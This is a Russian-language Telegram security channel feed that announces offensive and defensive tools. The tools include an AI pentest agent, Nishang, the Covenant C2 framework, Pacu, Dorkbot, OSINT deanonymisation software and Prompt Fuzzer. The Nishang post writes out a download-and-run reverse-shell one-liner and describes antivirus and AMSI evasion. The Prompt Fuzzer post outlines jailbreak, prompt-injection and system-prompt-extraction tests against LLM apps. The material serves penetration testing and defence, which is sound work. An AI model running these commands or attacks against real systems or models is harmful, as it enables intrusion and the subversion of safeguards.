Codeby
36.3K subscribers
1.97K photos
96 videos
12 files
7.76K links
Блог сообщества Кодебай

Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy

CTF: hackerlab.pro

VK: vk.com/codeby
YT: clck.ru/XG99c

Сотрудничество: @KinWiz

Реклама: @Savchenkova_Valentina
Download Telegram
🍎 EVA (Exploit Vector Agent) - агент для тестирования на проникновение с использованием искусственного интеллекта, который повышает эффективность работы в сфере наступательной безопасности, предоставляя структурированные рекомендации по атакам, контекстный анализ и интеграцию с несколькими бэкендами ИИ.

Основные функции
🔴Интеллектуальное моделирование: продвинутый анализ на базе ИИ и определение путей атаки в зависимости от запроса.
🔴Автоматизированное перечисление: систематическая разведка цели и сбор информации о ней.
🔴Оценка уязвимости: выявление уязвимостей с помощью ИИ и стратегии их эксплуатации, с рекомендациями следующих шагов для эксплуатации уязвимостей.
🔴Несколько ИИ-бэкендов: поддержка Ollama, OpenAI GPT, G4F.dev и пользовательских API-эндпоинтов.
🔴Управление сессиями: постоянные сессии и чаты.
🔴Интерактивный интерфейс: выполнение команд в режиме реального времени и анализ результатов в несколько этапов.

👻 Установка и настройка
curl -fsSL https://ollama.ai/install.sh | shr
git clone https://github.com/ARCANGEL0/EVA.git
cd EVA
chmod +x eva.py
sudo mv eva.py /usr/local/bin/eva


При запуске EVA система автоматически выполнит следующие действия:
🔴настройку ключа API OpenAI (при использовании бэкенда GPT);
🔴загрузку модели Ollama (WhiteRabbit-Neo. Также можно выбрать любую другую модель);
🔴создание каталога для сеансов, установку зависимостей.

🎓 Использование
Этап инициализации запускается командой:
python3 eva.py

Затем необходимо выбрать существующий сеанс или создать новый. Далее происходит выбор ИИ-бэкенда (Ollama, GPT-5, G4F, пользовательский API). И наконец можно ввести в чат сам запрос, с которым необходима помощь.

После отправки запроса будут предоставлены команды и запущен процесс тестирования на проникновение.

⭐️ Список возможных команд представлен ниже:
/exit или /quit - выход из EVA с сохранением сеанса;
/model - изменение серверной части ИИ;
/rename - переименовывание текущего сеанса;
/menu - возврат к меню сеанса;
R - запуск предложенной команды;
S - пропуск команды;
A - вопрос о следующем шаге;
Q - завершение сеанса.

P.S. Использовать данный инструмент разрешается только в легитимных целях для проведения тестирования на проникновение.

#tools #pentest #AI

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍188🔥7👎1
Что такое фишинговые ссылки и как они работают?

"Я же не кликаю на спам"— думаем мы, читая очередной пост о кибербезопасности. Такая уверенность, что фишинг обойдет нас стороной, стала его главным преимуществом. Мошенники постоянно оттачивают свои методы, а фишинговые ловушки становятся все изощреннее. Именно на автоматизм и миг невнимательности они и рассчитывают, создавая идеальные копии сайтов и писем.

Рассказываем, в чем суть фишинга, как проводится эта атака и почему ее жертвами становятся даже опытные пользователи.

➡️ В статье вы найдете рекомендации, как не попасться на мошенническую схему, и четкий план действий на случай, если вы уже оказались в ловушке.

#Фишинг #Инфобезопасность #БезопасностьАккаунтов

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥65
🐒 Infection Monkey — open source платформа эмуляции противника для тестирования устойчивости сети к реальным атакам

Infection Monkey имитирует поведение вредоносного ПО в контролируемой среде: агент сам распространяется по сети, пытается взламывать узлы и отправляет телеметрию на сервер Monkey Island для наглядных карт распространения и отчётов. Такой «безопасный вирус» помогает видеть реальные вектора атак и проверять, насколько хорошо срабатывают средства защиты и процессы.


🧾 Основные возможности Infection Monkey
📉 Два ключевых компонента: Agent — сетевой «червь», который заражает машины, ворует данные и доставляет полезную нагрузку, и Monkey Island — сервер управления и визуализации хода атаки.
📉 Поддерживает множество техник распространения: перебор предопределённых паролей, логические эксплойты, кражу учётных данных через Mimikatz.
🖱 Использует разные векторы эксплуатации: SSH, SMB, RDP, WMI, Log4Shell и другие RCE‑уязвимости, что позволяет моделировать современные сценарии компрометации.

🔎Как работает эмуляция «безопасного малвара»
➡️ Monkey Agent после запуска сканирует сеть, ищет активные хосты, выполняет fingerprinting и подбирает под них подходящие методы атаки.
➡️ Конфигурация агента позволяет приближенно повторять поведение реального малваря, но без разрушительных действий, чтобы проверять детект и реакцию в безопасном режиме.
➡️ Monkey Island собирает результаты, строит карту инфицирования и формирует отчёты, которые помогают видеть слабые места сегментации, аутентификации и мониторинга.

⬇️ Установка и запуск
➡️ Базовый сетап
▶️ Infection Monkey распространяется в виде готовых пакетов и образов; для быстрого старта можно скачать сборку с сайта/репозитория и следовать гайдам из документации (Setup / Getting Started).
▶️ Поддерживаются разные платформы и варианты развёртывания Monkey Island и агента; подробные инструкции есть в официальном документационном хабе.

➡️ Тестирование и отчётность
▶️ После развёртывания Monkey Island настраивается сценарий: от какой машины стартует агент, какие техники ему доступны и какие сегменты сети можно трогать.
▶️ По итогам симуляции формируются карты атак и детальные security‑отчёты, которые можно использовать как основу для укрепления контроля доступа, сегментации и SOC‑процессов.

#security #bas #pentest #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍9🔥9🤔3🙊2
OSINT-SAP Project

Бесплатный OSINT-SAN Framework дает возможность быстро находить информацию и деанонимизировать пользователей сети интернет. С помощью нашего ПО вы сможете собирать информацию о пользователях как при использовании linux.

📕Характиристика:
1️⃣Сканирование и вывод информации IP и доменных адресов (Whois, shodan, DNS lookup, TCP port scan)
2️⃣Сбор информации о мобильном номере
3️⃣Создание рандомной сетевой личности
4️⃣Поиск по никнейму
5️⃣Поиск по bitcoin кошельку

💻Установка:
git clone https://github.com/Bafomet666/OSINT-SAN.git

cd OSINT-SAN/

pip3 install -r requirements.txt --break-system-packages


📌Запуск:
python3 osintsan.py


#tools #osint

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥137👍7👾2🤷‍♂1👎1
Adversarial Robustness Toolbox (ART) — это Python‑библиотека для безопасности моделей машинного обучения: она помогает атаковать, защищать и проверять ML‑системы на устойчивость к угрозам вроде подмены входных данных или отравления обучающей выборки.

🔎 Что такое ART и кому она нужна
ART развивается под эгидой Linux Foundation AI & Data и изначально была запущена IBM как открытый инструмент для исследований в области adversarial machine learning. Библиотека ориентирована одновременно на red team и blue team.

❗️ Поддерживаемые фреймворки, данные и задачи
➡️ Фреймворки: TensorFlow, Keras, PyTorch, MXNet, scikit‑learn, XGBoost, LightGBM, CatBoost, GPy и др., то есть большинство популярных стеков для классического ML и DL.
➡️ Типы данных: изображения, табличные данные, аудио, видео и другие форматы, что позволяет тестировать как CV‑модели, так и, например, речь или временные ряды.
➡️ Задачи: классификация, детекция объектов, генерация, задачи сертификации и верификации устойчивости и т.п.

⛓️‍💥 Типы атак в ART
ART реализует десятки сценариев, сгруппированных вокруг четырёх основных классов угроз:
⏺️Evasion: небольшие модификации входных данных, которые заставляют модель ошибаться (adversarial examples для картинок, аудио и т.д.).
⏺️Poisoning: изменение обучающей выборки для скрытого влияния на поведение модели в проде.
⏺️Extraction: попытка «украсть» модель через массовые запросы к её API и восстановить или клонировать её поведение.
⏺️Inference: атаки на приватность, когда по ответам модели пытаются восстановить данные обучения.

#ai #security #adversarial #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍8🔥6👾2
Forwarded from Hacker Lab
🚩 Новые задания на платформе HackerLab!

🎢 Категория РазноеDrakosha Ali

🔎 Категория OSINTСпецслужбы

Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍85🎉1
⚡️ Nishang — набор скриптов и полезных нагрузок, позволяющих использовать PowerShell для наступательной безопасности, тестирования на проникновение и работы в составе «красной команды».

⏺️ Сотни готовых скриптов, сгруппированных по фазам: Gather (сбор инфы, ключи WiFi, LSASS, pass hints), Escalation (UAC bypass, duplicate tokens), Shells (TCP/UDP/HTTP/ICMP reverse shells), Backdoors (HTTP/DNS/WMI persistence).
⏺️ Клиентские векторы: генерация фишинговых CHM, Word/Excel, HTA, JS/SCF/SCT для выполнения PS‑команд; поддержка MITM и exfiltration через Gmail/Pastebin/DNS.
⏺️ Utility‑функции: Invoke-Encode для кодирования скриптов (обход AV), in‑memory execution, port scan, brute‑force и даже Powerpreter — монолитный модуль со всей функциональностью.

☁️ Базовый сценарий использования
➡️ Импорт всех скриптов в сессию:
Import-Module .\nishang.psm1  


Или dot‑sourcing отдельных:
. C:\nishang\Gather\Get-Information.ps1
Get-Information


➡️ Помощь по скриптам: Get-Help <scriptname> -Full (функция с именем скрипта экспортируется в сессию).
➡️ In‑memory запуск с удалённого хоста (через web shell/meterpreter):
powershell iex (New-Object Net.WebClient).DownloadString('http://<server>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port>


⬇️ Установка и запуск
🔔 Быстрый старт
- Клонировать репозиторий и импортировать в PowerShell v3+:
git clone https://github.com/samratashok/nishang
cd nishang
Import-Module .\nishang.psm1


- Для обхода AV использовать Invoke-Encode:
. .\Utility\Invoke-Encode
Invoke-Encode -DataToEncode Invoke-PowerShellTcp.ps1 -OutCommand


Затем запустить encodedcommand на цели: powershell -e <encoded>

🔔 Обход AMSI и AV
➡️ Скрипты часто детектятся, но работают in‑memory; для AMSI в Win10+ — используйте Invoke-AmsiBypass или кастомизацию имён функций/параметров.
➡️ Для non‑PowerShell шеллов — encodedcommand с вызовом экспортированной функции внутри скрипта.

#powershell #redteam #pentest #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
13👍5🔥5
WAFW00F: Технологический инструмент для идентификации веб-приложений межсетевых экранов
WAFW00F - инструмент с открытым исходным кодом, разработанный для точного определения и классификации (снятия отпечатков) продуктов Web Application Firewall (WAF), защищающих веб-сайт. Поддержкой и развитием проекта занимается компания EnableSecurity. Этот инструмент является стандартным в арсенале специалистов по кибербезопасности, пентестеров и администраторов, позволяя им проанализировать безопасностный периметр целевого приложения.


👉WAFW00F использует трехуровневый подход для определения WAF:
▶️Пассивный анализ - отправляет обычный HTTP-запрос и ищет сигнатуры в заголовках (например, X-Protected-By, Server), cookies или HTML-коде. Многие WAF оставляют уникальные следы
▶️Активное тестирование - если пассивный анализ не сработал, отправляет подозрительные запросы (инъекции SQL, XSS). Анализирует ответы на блокировку (специальные страницы ошибок, коды состояния (403, 406) или заголовки)
▶️Эвристический анализ - если первые два шага не дали результата, применяет алгоритмы к собранным ответам, чтобы определить, реагирует ли система безопасности на зондирование.
База сигнатур включает более
150 WAF (Cloudflare, Imperva Incapsula, F5 BIG-IP, Fortinet, ModSecurity, AWS, Google Cloud, Microsoft Azure и другие)
.


⬇️Установка
pipх install wafw00f

Проверка
wafw00f -h


⏺️Базовая проверка
wafw00f https://example.org

При успешном обнаружении вывод будет содержать информацию о производителе и модели WAF.

⏺️Просмотр полного списка детектируемых систем защиты
wafw00f -l

Эта команда выводит обширную таблицу с именами WAF и их производителями, что полезно для ознакомления с возможностями инструмента.

⏺️Проверка нескольких целей и вывод в файл
wafw00f https://site1.com http://site2.net -o results.json

Флаг -o (или --output) позволяет экспортировать результаты в файл. Формат (JSON, CSV, plain text) определяется по расширению файла (.json, .csv, .txt).

⏺️Агрессивное тестирование для выявления всех возможных WAF
wafw00f https://target.com -a -v

Ключ -a (--findall) заставляет инструмент продолжить тестирование даже после первого успешного совпадения, чтобы найти все возможные WAF. Флаг -v увеличивает детализацию вывода.

#WAFW00F #tool #pentest #WAF

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍118🔥7
🐘 Pacu — фреймворк для эксплуатации AWS‑окружений и проверки облачной безопасности

Pacu — открытый AWS exploitation‑фреймворк от Rhino Security Labs, который помогает выявлять ошибки конфигурации в аккаунтах AWS. Инструмент построен модульно, поддерживает десятки сценариев атак (от эскалации привилегий до обхода логирования) и позволяет быстро собирать боевые цепочки действий против облачной инфраструктуры.

🎇 Основные возможности Pacu
📉 Модульная архитектура: десятки модулей для скнирования, повышения привелегий и создание бекдоров IAM‑пользователей, атак на Lambda и работы с логами.
📉 Использует локальную SQLite‑БД и общую структуру данных, чтобы повторно использовать результаты модулей и минимизировать количество AWS API‑запросов.
🖱 Встроенный аудит: логирование команд, экспорт отчётов и таймлайна атаки для последующего анализа и документирования.

💻 Базовый сценарий использования
▶️ Первый запуск создаёт сессию, в которой хранятся AWS‑ключи и все собранные данные; можно держать несколько сессий под разные тесты и окружения.
▶️ Через команду set_keys задаются access key, secret key и (опционально) session token, после чего становятся доступны модули для работы с целевым AWS‑аккаунтом.
▶️ Команды list, help <module>, run <module> помогают быстро находить нужные модули и запускать их с параметрами, включая таргетинг по регионам (--regions eu-west-1,us-west-1).

⬇️ Установка и запуск
⏺️ Установка Pacu и зависимостей:
pip3 install -U pip
pip3 install -U pacu
pacu

⏺️ При первом запуске задать имя сессии и затем добавить AWS‑ключи командой set_keys по интерактивным подсказкам.

2️⃣ Запуск через Docker
⏺️ Запуск с дефолтным entrypoint:
docker run -it rhinosecuritylabs/pacu:latest


⏺️ Для работы с реальными AWS‑кредитами можно примонтировать локальные ~/.aws в контейнер
docker run -it -v ~/.aws:/root/.aws rhinosecuritylabs/pacu:latest


#aws #security #pentest #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍5🔥5👎1
🤖 Как выявлять и предотвращать утечки информации по сетевым скрытым каналам

Команда HEX.TEAM приглашает на открытый профессиональный вебинар «Противодействие утечке информации по сетевым скрытым каналам» — с разбором теории, практики и реальных кейсов из проектов.

О чём поговорим:

• как строятся классические и современные сетевые скрытые каналы в различных сетевых протоколах

• как определить, является ли угроза утечки информации по сетевым скрытым каналам реальной для вашей организации

• как выстраивается система защиты от подобных утечек

📅 Дата: 18/02/2026
🕓 Время: 16:00
💻 Онлайн, участие бесплатное

Спикер:
Михаил Финошин
руководитель отдела исследований ИБ HEX.TEAM
старший преподаватель кафедры «Криптология и кибербезопасность» НИЯУ МИФИ
автор более 15 научных публикаций по информационной безопасности

Количество мест ограничено.
👉 Регистрация на вебинар 👈

Подписывайтесь на канал HEX.TEAM - здесь мы регулярно делимся практикой, кейсами и инженерным взглядом на информационную безопасность.

Реклама. Erid: 2VtzqvmkHqd
8👍6🔥41
Dorkbot: Автоматизированный инструмент для поиска уязвимостей через поисковые системы

Dorkbot — модульный инструмент командной строки с открытым исходным кодом, предназначенный для автоматизации поиска уязвимостей на веб-ресурсах, обнаруженных через публичные поисковые системы или архивы интернета (Common Crawl и Wayback Machine). Его архитектура разделяет процессы сбора целей (индексирования) и их проверки (сканирования), что обеспечивает гибкость и контроль на каждом этапе безопасности.


👉Dorkbot функционирует на основе модульной системы, состоящей из двух ключевых компонентов:
▶️Индексаторы (Indexers) - модули, отвечающие за сбор списка целей (URL-адресов). Они выполняют поисковые запросы через различные источники
▶️Сканеры (Scanners) - модули, которые выполняют непосредственно проверку безопасности каждой собранной цели на наличие уязвимостей
Все обнаруженные цели сохраняются в базе данных, что позволяет управлять ими, отслеживать статус проверки и избегать дублирования. После сканирования формируется детальный отчет в формате
JSON
, содержащий информацию о найденных уязвимостях.


⬇️Установка
pipх install dorkbot 

Проверка
dorkbot -h


⏺️Выполним поиск целей через Google Custom Search API (индексатор google_api) и сразу сканируем 10 случайных целей из найденных с помощью сканера Wapiti
dorkbot -i google_api -o key=YOUR_API_KEY -o engine=YOUR_CSE_ID -o query="inurl:view.php?id=" -s wapiti --count 10 --random --log scan_session.log

▶️-i google_api и -o - активируют индексатор Google API и передают ему необходимые аргументы (ключ, ID поисковой системы и поисковый запрос)
▶️-s wapiti - указывает сканер для проверки уязвимостей
▶️--count 10 - ограничивает обработку (индексацию и/или сканирование) 10 целями
▶️--random - обеспечивает случайный порядок выбора целей для обработки, что полезно для выборки
▶️--log scan_session.log - перенаправляет вывод логов в указанный файл для последующего анализа

⏺️Эта команда демонстрирует работу с базой данных целей и блоклистом без запуска сканирования
dorkbot -d /opt/security/dorkbot.db --list-targets --unscanned-only --add-blocklist-item "regex:.*logout.*" --add-blocklist-item "host:admin.example.com" --prune

▶️-d /opt/security/dorkbot.db - указывает путь к файлу базы данных SQLite
▶️--list-targets --unscanned-only - выводит список всех целей, которые еще не были отсканированы
▶️--add-blocklist-item - добавляет правила в блоклист. В данном случае блокируются все URL, содержащие подстроку logout (регулярное выражение), и все цели с хостом admin.example.com
▶️--prune - критически важная операция, которая применяет правила блоклиста и систему отпечатков (fingerprinting) к существующей базе данных.
Цели, соответствующие новым правилам блоклиста, будут помечены как отсканированные (или удалены, если добавить флаг -m), а дубликаты на основе отпечатков будут исключены из очереди на сканирование


#dorkbot #tool #pentest #URL

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍6🔥5
☁️ Covenant — .NET C2‑фреймворк для пост-эксплуатаци

Covenant — кросс-платформенный C2 на ASP.NET Core с веб‑панелью, много‑пользовательским режимом и поддержкой «Grunt»‑имплантов для управления скомпрометированными хостами в корпоративных сетях.


⛓️‍💥 Основные возможности Covenant
📉 Интуитивный web‑интерфейс: управление слушателями, имплантами (Grunts), задачами, файлами и отчётами прямо из браузера, с поддержкой нескольких операторов одновременно.
📉 Мульти-платформенность и Docker: сервер на .NET Core можно запускать на Linux, Windows и macOS, а также в Docker‑контейнере, что удобно для lab‑окружений и изолированных C2‑хостов.
🖱 Listener Profiles: профили слушателей позволяют кастомизировать HTTP(S)/Network‑трафик, маскируя его под легитимные запросы и упрощая обход детекта.

🧠 Импланты Grunt и криптография
⏺️ Grunt — это .NET‑имплант, который периодически коннектится к слушателю, получает команды, исполняет их и отправляет результаты, поддерживая типичные C2‑операции (команды, файлы, модульные задачи).
⏺️ Реализован защищённый обмен ключами + опциональный SSL, что обеспечивает forward secrecy и защищает трафик от пассивного прослушивания.
⏺️ Dynamic Compilation: каждое новое задание или Grunt компилируются «на лету» через Roslyn и обфусцируются ConfuserEx, что снижает количество полностью статичных сигнатурных пейлоадов.

⬇️ Установка и запуск
1️⃣ Быстрый старт через .NET / git
▶️ Клонировать репозиторий и собрать приложение:
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
dotnet build
dotnet run


▶️ Затем открыть панель по адресу вида https://127.0.0.1:7443/, создать учётку оператора и перейти к настройке Listener/Launcher/Grunt.

2️⃣ Запуск через Docker
▶️ Использовать готовый Docker‑образ и пробросить порты + volume для хранения данных:
docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v </absolute/path/to/Covenant/Covenant/Data>:/app/Data covenant


▶️ После старта сервер работает как обычный C2‑бэкенд, доступный по HTTPS для всей команды.

#c2 #dotnet #redteam #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
8🔥7👍5
🧠 Prompt Fuzzer — интерактивный fuzzer для защиты системного промпта GenAI‑приложений

Prompt Fuzzer — это open source‑утилита для динамического тестирования системного промпта на устойчивость к jailbreak‑атакам, prompt‑инъекциям и попыткам вытянуть системные данные


💻 Что умеет Prompt Fuzzer
🔔 Моделирует реальные атаки на промпт: jailbreak (DAN, AIM, harmful behavior, amnesia, linguistic evasion и др.), prompt injection (authoritative role, typoglycemia и др.) и системный prompt extraction
🔔 Динамически адаптирует тесты под домен и конфигурацию конкретного приложения, чтобы проверки были ближе к боевым сценариям использования.
🔔 Выдаёт оценку безопасности промпта по каждой атаке: broken (сломали защиту), resilient (выдержал), errors (неоднозначный результат), помогая понять, где именно промпт уязвим.

⬇️ Установка и запуск
👉 Установка через pip:
pip install prompt-security-fuzzer


👉 Затем задать ключ LLM‑провайдера (по умолчанию OPENAI_API_KEY):
export OPENAI_API_KEY=sk-123XXXXXXXXXXXX
prompt-security-fuzzer



👉 Переменные окружения
- Можно использовать .env рядом с утилитой, либо экспортировать ключи напрямую.
- Поддерживаются 16+ провайдеров: OpenAI, Anthropic, Azure OpenAI, Cohere, Google PaLM, YandexGPT, Baichuan, Jina, PromptLayer и др. через свои ENV‑ключи (ANTHROPIC_API_KEY, GOOGLE_API_KEY, YC_API_KEY и т.п.).

🧾 Режимы работы и CLI
⏺️ Интерктивный режим (по умолчанию):
1) Запускаете prompt-security-fuzzer,
2) Вставляете системный промпт,
3) Запускаете серию атак и потом дорабатываете промпт в встроенном Playground‑чате.

⏺️ Batch‑режим для CI/CD и автопроверок:
➡️ Прогнать тесты по готовому файлу с системным промптом:
prompt-security-fuzzer -b ./system_prompt.examples/medium_system_prompt.txt


➡️ Подключить кастомный бенчмарк атак:
prompt-security-fuzzer -b ./system_prompt.examples/medium_system_prompt.txt \
--custom-benchmark=ps_fuzz/attack_data/custom_benchmark1.csv


➡️ Запустить только подмножество тестов:
prompt-security-fuzzer -b ./system_prompt.examples/medium_system_prompt.txt \
--custom-benchmark=ps_fuzz/attack_data/custom_benchmark1.csv \
--tests='["ucar","amnesia"]'


#security #ai #llm #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
3👍2🔥2